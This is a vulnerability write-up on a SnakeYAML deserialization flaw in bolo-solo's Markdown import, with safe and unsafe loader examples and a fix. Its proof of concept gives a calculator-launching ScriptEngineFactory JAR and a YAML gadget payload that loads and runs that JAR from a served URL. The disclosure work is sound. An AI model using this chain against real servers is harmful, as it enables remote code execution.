In the bolo-solo v2.6.4_stable version, there is a deserialization vulnerability in the "import/markdown" path. This vulnerability stems from an insecure YAML loading issue.
Vulnerability file: src/main/java/org/b3log/solo/bolo/prop/BackupService.java

Follow up on the importMarkdownsSync() method. This method reads all the .md files within the uploaded compressed package and obtains the article object for each one through the parseArticle() method.

Follow up on the parseArticle() method. This method loads the content of the read file using YAML. However, the safe loading method (a SafeConstructor-based loader) was not adopted here, so the default SnakeYAML loader resolves arbitrary "!!" tags to Java classes, resulting in the SnakeYAML deserialization vulnerability.
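To make the root cause concrete, the following is an added example written for this write-up; it is not bolo-solo's own code. It places the vulnerable loader pattern next to the fixed one and parses constructed front-matter samples with each. The file name FrontMatterLoader, the method names, and the sample documents are assumptions; the tag "!!com.example.AnyClass" is a placeholder class name, since any non-standard global tag is enough to show that SafeConstructor rejects it, whereas the default constructor would try to instantiate the named class.

```java
import org.yaml.snakeyaml.LoaderOptions;
import org.yaml.snakeyaml.Yaml;
import org.yaml.snakeyaml.constructor.SafeConstructor;
import org.yaml.snakeyaml.error.YAMLException;

import java.util.Map;

/**
 * Added example (not bolo-solo code): unsafe versus safe SnakeYAML loading
 * of the YAML front matter found in an imported Markdown file.
 * parseFrontMatterUnsafe mirrors the pattern the advisory describes;
 * parseFrontMatterSafe is the corresponding fix.
 */
public class FrontMatterLoader {

    // Constructed sample: what a benign imported article's front matter looks like.
    static final String BENIGN =
            "title: Hello\n" +
            "tags: [a, b]\n" +
            "date: 2021-01-01\n";

    // Constructed sample with an arbitrary global tag. The class name is a
    // placeholder; any non-standard "!!" tag triggers the same code path.
    static final String TAGGED =
            "title: !!com.example.AnyClass [\"x\"]\n";

    /** Vulnerable pattern: the default Constructor resolves "!!" tags to arbitrary classes. */
    static Map<String, Object> parseFrontMatterUnsafe(String yaml) {
        Yaml loader = new Yaml();          // default Constructor: full object construction
        return loader.load(yaml);
    }

    /**
     * Fixed pattern: SafeConstructor only knows the standard YAML tags
     * (str, int, map, seq, timestamp, ...). Any other tag raises a
     * ConstructorException instead of instantiating a class.
     * Note: SafeConstructor(LoaderOptions) exists in SnakeYAML 1.33+ and 2.x;
     * older 1.x releases use the no-argument SafeConstructor().
     */
    static Map<String, Object> parseFrontMatterSafe(String yaml) {
        LoaderOptions options = new LoaderOptions();
        options.setAllowDuplicateKeys(false);      // extra hardening, optional
        Yaml loader = new Yaml(new SafeConstructor(options));
        return loader.load(yaml);
    }

    public static void main(String[] args) {
        // Benign front matter parses identically with both loaders.
        System.out.println("unsafe, benign: " + parseFrontMatterUnsafe(BENIGN));
        System.out.println("safe,   benign: " + parseFrontMatterSafe(BENIGN));

        // The tagged document is refused by the safe loader before any class is touched.
        try {
            parseFrontMatterSafe(TAGGED);
            System.out.println("unexpected: tagged document was accepted");
        } catch (YAMLException e) {
            System.out.println("safe,   tagged: rejected -> " + e.getMessage());
        }
    }
}
```

The check a reviewer would apply to parseArticle() is simply whether the Yaml instance is built with SafeConstructor (or an equivalent allow-listed constructor); a bare new Yaml() on attacker-supplied input is the defect.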

After execution, the calculator successfully popped up.

POC:
Step 1: Create a JAR file whose only function is launching the local calculator.
package artsploit;

import javax.script.ScriptEngine;
import javax.script.ScriptEngineFactory;
import java.io.IOException;
import java.util.List;

// Loaded through the service-provider mechanism when ScriptEngineManager
// scans the JAR; the constructor runs as a side effect of that discovery.
public class AwesomeScriptEngineFactory implements ScriptEngineFactory {

    public AwesomeScriptEngineFactory() {
        try {
            Runtime.getRuntime().exec("calc.exe");
        } catch (IOException e) {
            e.printStackTrace();
        }
    }

    // The remaining interface methods are stubs; only the constructor matters.
    @Override
    public String getEngineName() {
        return null;
    }

    @Override
    public String getEngineVersion() {
        return null;
    }

    @Override
    public List<String> getExtensions() {
        return null;
    }

    @Override
    public List<String> getMimeTypes() {
        return null;
    }

    @Override
    public List<String> getNames() {
        return null;
    }

    @Override
    public String getLanguageName() {
        return null;
    }

    @Override
    public String getLanguageVersion() {
        return null;
    }

    @Override
    public Object getParameter(String key) {
        return null;
    }

    @Override
    public String getMethodCallSyntax(String obj, String m, String... args) {
        return null;
    }

    @Override
    public String getOutputStatement(String toDisplay) {
        return null;
    }

    @Override
    public String getProgram(String... statements) {
        return null;
    }

    @Override
    public ScriptEngine getScriptEngine() {
        return null;
    }
}

Step 2: Place the malicious JAR file on a web server. Here, we use Python's built-in HTTP server to serve it.

Step 3: Package the malicious .md document into a compressed archive and upload it to the server.
MD document POC:
!!javax.script.ScriptEngineManager [
!!java.net.URLClassLoader [[
!!java.net.URL ["http://127.0.0.1:8000/yaml-payload.jar"]
]]
]
Click upload; importing the archive triggers the vulnerability.
